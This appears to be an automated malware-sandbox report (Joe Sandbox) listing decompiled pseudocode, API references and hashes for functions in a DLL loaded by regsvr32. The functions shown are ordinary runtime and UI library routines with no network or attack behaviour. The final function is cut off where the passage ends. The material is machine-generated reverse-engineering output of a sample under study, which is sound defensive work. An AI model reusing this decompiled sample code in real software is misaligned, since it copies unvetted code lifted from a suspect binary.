Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90

Uniqueness

Uniqueness Score: -1.00%

Function 10033EA1 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10033EA1(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F1A(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x10033ea4
0x10033ea7
0x10033eac
0x10033ef8
0x10033efe
0x00000000
0x10033eae
0x10033eb7
0x10033ebc
0x10033ef2
0x10033ef4
0x10033f03
0x10033f03
0x10033f15
0x10033f1e
0x10033f20
0x10033f23
0x10033f25
0x10033ec3
0x10033ec5
0x10033ec9
0x10033ed1
0x10033ed8
0x10033edb
0x10033edb
0x10033ebc
0x10033f2c

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4

Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77

MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90

Uniqueness

Uniqueness Score: -1.00%

Function 1001519D Relevance: 7.5, APIs: 5, Instructions: 37
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E1001519D(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x1004f5e0( *0x1004c848);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E1001382A(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E10011400(0x10);
					} else {
						_push(_t17);
						_push( *0x1004c848);
						if( *0x1004f5e4() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x1004cb00;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}

0x1001519f
0x100151ab
0x100151b3
0x100151b5
0x100151b7
0x100151b9
0x100151be
0x100151c5
0x100151cb
0x100151fa
0x100151fc
0x100151cd
0x100151cd
0x100151ce
0x100151dc
0x00000000
0x100151de
0x100151de
0x100151e5
0x100151ec
0x100151f2
0x100151f6
0x100151f6
0x100151dc
0x100151cb
0x10015203
0x1001520d

APIs

GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203

Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC

FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
GetCurrentThreadId.KERNEL32 ref: 100151EC

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
String ID:
API String ID: 1487844433-0
Opcode ID: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
Instruction ID: 04c9e0168ef1b4a2d5000d056184ae8950552c627320cfc90ecd4b0af594dd98
Opcode Fuzzy Hash: b2f315a77b2b4df7a3c1e85649ddbe99070d14f731bb33650b41be055e3ed3d9
Instruction Fuzzy Hash: F4F0C2326017269FE3225F648C49E463BE0EB017A2F104219F942CE1E1DFB5C8808794

Uniqueness

Uniqueness Score: -1.00%

Function 10016B44 Relevance: 7.5, APIs: 5, Instructions: 32
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016B44() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x1004c470; // 0xf256d946
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x1004c470 = _t22;
					if(_t22 == 0) {
						 *0x1004c470 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}

0x10016b4a
0x10016b51
0x10016b5f
0x10016b6b
0x10016b73
0x10016b7b
0x10016b87
0x10016b90
0x10016b93
0x10016b95
0x10016b9b
0x10016b9d
0x10016b9d
0x00000000
0x10016ba7
0x10016ba9

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
GetCurrentProcessId.KERNEL32 ref: 10016B6B
GetCurrentThreadId.KERNEL32 ref: 10016B73
GetTickCount.KERNEL32 ref: 10016B7B
QueryPerformanceCounter.KERNEL32(?), ref: 10016B87

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80

Uniqueness

Uniqueness Score: -1.00%

Function 1002C1A7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed int _v32;
				struct tagRECT _v48;
				signed int _v52;
				signed int _v56;
				struct tagRECT _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t170;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t175;
				signed int _t177;
				intOrPtr* _t179;
				signed char _t183;
				signed int _t184;
				signed int _t186;
				intOrPtr* _t200;
				intOrPtr* _t204;
				signed int _t220;
				intOrPtr* _t223;
				signed char _t233;
				signed int _t247;
				signed int _t249;
				signed int _t258;
				signed int _t261;
				signed int _t266;
				signed int _t268;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr _t275;
				signed int _t277;
				intOrPtr* _t282;

				_t268 = 0;
				_push(0);
				_t223 = __ecx;
				_push(0);
				_push(0x418);
				_v16 = 0;
				_v56 = 0;
				_v52 = 0;
				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
				_v32 = _t277;
				if(_t277 != 0) {
					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
					_v16 = _t175;
					if(_t277 > 0) {
						_v12 = _t175;
						do {
							E1002B71F(_t223, _t268, _v12);
							_v12 = _v12 + 0x14;
							_t268 = _t268 + 1;
						} while (_t268 < _t277);
						_t270 = _v16;
						_t177 = 0;
						if(_t277 > 0) {
							_t233 =  *(_t223 + 0x7c);
							if((_t233 & 0x00000002) == 0) {
								_t266 = _t233 & 0x00000004;
								_v48.bottom = _t266;
								if(_t266 == 0) {
									L19:
									_push(_t177);
									asm("sbb eax, eax");
									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t177;
									goto L20;
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t177);
										_push( *((intOrPtr*)(_t223 + 0x6c)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t233 & 0x00000001;
													if((_t233 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
													_t220 = _a8 & 0x00000020;
													__eflags = _t220;
													if(_t220 == 0) {
														_t258 = _v48.right - _v48.left;
														__eflags = _t258;
													} else {
														_t258 = _v48.bottom - _v48.top;
													}
													_push(_t220);
													_push(_t258 + _a12);
												}
											} else {
												_push(0);
												L20:
												_push(_t177);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t277);
								_push(_t270);
								E1002BCF4(_t223, _t266);
							}
							_push(_t277);
							_push(_t270);
							_push( &(_v48.right));
							_t179 = E1002BBD2(_t223);
							_v56 =  *_t179;
							_v52 =  *((intOrPtr*)(_t179 + 4));
							if((_a8 & 0x00000040) != 0) {
								_t261 = 0;
								_v8 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
								if(_t277 > 0) {
									_t200 = _t270 + 4;
									_v24 = _t200;
									_t247 = _t277;
									do {
										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
											_t261 = _t261 + 1;
										}
										_t200 = _t200 + 0x14;
										_t247 = _t247 - 1;
									} while (_t247 != 0);
									_a12 = _t261;
									if(_t261 > 0) {
										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
										if(_t273 == 0) {
											_t64 =  &_v8;
											 *_t64 = _v8 & 0x00000000;
											__eflags =  *_t64;
										} else {
											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
											_v8 = _t273;
										}
										_a12 = _a12 & 0x00000000;
										_v12 = _v12 & 0x00000000;
										_t204 = _v24;
										_t275 = _v8 + 8;
										_v20 = _t275;
										_v24 = _t204;
										do {
											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
												_t249 = _v12;
												 *((intOrPtr*)(_t275 - 8)) = _t249;
												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
												E10028E96(_t223,  &_v72);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t204 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t277 = _v32;
												_t275 = _v20;
											}
											_v12 = _v12 + 1;
											_t204 = _t204 + 0x14;
											_v24 = _t204;
										} while (_v12 < _t277);
									}
								}
								_t183 =  *(_t223 + 0x7c);
								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
								}
								_t271 = 0;
								_t307 = _t277;
								if(_t277 > 0) {
									_v20 = _v16;
									do {
										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
										_v20 = _v20 + 0x14;
										_t271 = _t271 + 1;
									} while (_t271 < _t277);
								}
								_t184 = _a12;
								if(_t184 > 0) {
									_t282 = _v8 + 8;
									_a12 = _t184;
									do {
										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
										_v32 = _t186;
										if(_t186 != 0) {
											GetWindowRect( *(_t186 + 0x1c),  &_v72);
											_t271 = _v72.left -  *_t282;
											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
										}
										_t282 = _t282 + 0x18;
										_t125 =  &_a12;
										 *_t125 = _a12 - 1;
										_t313 =  *_t125;
									} while ( *_t125 != 0);
									_push(_v8);
									L1001F7A9(_t223, _t271, _t282, _t313);
								}
								_t270 = _v16;
								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
							}
							_push(_t270);
							L1001F7A9(_t223, _t270, _t277, _t313);
						}
					}
				}
				SetRectEmpty( &_v72);
				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
				_v52 = _v52 + _v72.top - _v72.bottom;
				_v56 = _v56 + _v72.left - _v72.right;
				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t170 = _v48.right;
				if(_v56 <= _t170) {
					_v56 = _t170;
				}
				_t171 = _v48.bottom;
				if(_v52 <= _t171) {
					_v52 = _t171;
				}
				_t172 = _a4;
				 *_t172 = _v56;
				 *(_t172 + 4) = _v52;
				return _t172;
			}

0x1002c1b0
0x1002c1b2
0x1002c1b3
0x1002c1b7
0x1002c1b8
0x1002c1bd
0x1002c1c0
0x1002c1c3
0x1002c1cc
0x1002c1d2
0x1002c1d5
0x1002c1e2
0x1002c1ea
0x1002c1ed
0x1002c1f3
0x1002c1f6
0x1002c1fc
0x1002c201
0x1002c205
0x1002c206
0x1002c20a
0x1002c20d
0x1002c211
0x1002c217
0x1002c21d
0x1002c225
0x1002c228
0x1002c22b
0x1002c299
0x1002c299
0x1002c2a1
0x1002c2a3
0x1002c2a3
0x00000000
0x1002c22d
0x1002c231
0x1002c293
0x1002c293
0x1002c294
0x1002c233
0x1002c237
0x1002c241
0x1002c245
0x1002c24a
0x1002c24e
0x1002c28e
0x1002c291
0x00000000
0x00000000
0x00000000
0x00000000
0x1002c250
0x1002c254
0x1002c269
0x1002c272
0x1002c272
0x1002c275
0x1002c282
0x1002c282
0x1002c277
0x1002c27a
0x1002c27a
0x1002c285
0x1002c28b
0x1002c28b
0x1002c247
0x1002c247
0x1002c2a8
0x1002c2a8
0x1002c2a8
0x1002c239
0x1002c239
0x1002c23a
0x1002c23a
0x1002c237
0x1002c231
0x1002c2a9
0x1002c2ac
0x1002c2ad
0x1002c2ad
0x1002c2b2
0x1002c2b3
0x1002c2b7
0x1002c2ba
0x1002c2c8
0x1002c2cb
0x1002c2ce
0x1002c2da
0x1002c2de
0x1002c2e1
0x1002c2e4
0x1002c2e7
0x1002c2ed
0x1002c2f3
0x1002c2f6
0x1002c2f9
0x1002c2fb
0x1002c2ff
0x1002c306
0x1002c306
0x1002c307
0x1002c30a
0x1002c30a
0x1002c30f
0x1002c312
0x1002c324
0x1002c329
0x1002c340
0x1002c340
0x1002c340
0x1002c32b
0x1002c336
0x1002c33b
0x1002c33b
0x1002c347
0x1002c34b
0x1002c34f
0x1002c352
0x1002c355
0x1002c358
0x1002c35b
0x1002c35f
0x1002c366
0x1002c369
0x1002c372
0x1002c37a
0x1002c386
0x1002c38b
0x1002c38e
0x1002c392
0x1002c398
0x1002c399
0x1002c39a
0x1002c39b
0x1002c39c
0x1002c39f
0x1002c39f
0x1002c3a2
0x1002c3a5
0x1002c3ab
0x1002c3ab
0x1002c35b
0x1002c312
0x1002c3b0
0x1002c3b5
0x1002c3be
0x1002c3be
0x1002c3c1
0x1002c3c3
0x1002c3c5
0x1002c3ca
0x1002c3cd
0x1002c3d3
0x1002c3d8
0x1002c3dc
0x1002c3dd
0x1002c3cd
0x1002c3e1
0x1002c3e6
0x1002c3eb
0x1002c3ee
0x1002c3f1
0x1002c3f6
0x1002c3fd
0x1002c400
0x1002c409
0x1002c417
0x1002c425
0x1002c42c
0x1002c44b
0x1002c44b
0x1002c450
0x1002c453
0x1002c453
0x1002c453
0x1002c453
0x1002c458
0x1002c45b
0x1002c460
0x1002c464
0x1002c467
0x1002c467
0x1002c46d
0x1002c46e
0x1002c473
0x1002c211
0x1002c1ed
0x1002c478
0x1002c48d
0x1002c49a
0x1002c4a5
0x1002c4b3
0x1002c4b8
0x1002c4c1
0x1002c4c3
0x1002c4c3
0x1002c4c6
0x1002c4cc
0x1002c4ce
0x1002c4ce
0x1002c4d1
0x1002c4d7
0x1002c4dc
0x1002c4e0

APIs

SetRectEmpty.USER32(?), ref: 1002C254
GetWindowRect.USER32 ref: 1002C409
SetRectEmpty.USER32(?), ref: 1002C478

Strings

@, xrefs: 1002C2BF

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Empty$Window
String ID: @
API String ID: 444217639-2766056989
Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E14F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E10011BF0(0x1003af36, _t263);
				_t130 =  *0x1004c470; // 0xf256d946
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x10043008);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E1000B1A4(_t263 - 0x70, 0x10043744);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E1000B1A4(_t263 - 0x40, 0x1004372c);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x10043208);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x10043348);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E1001F77E(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E1000B427(_t229, _t172 + 4);
						}
						if(E1001F77E(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E10009E9C(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E1000DB7F(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E1001F77E(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E1001E0EA(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E10006D96(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E1001E047( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
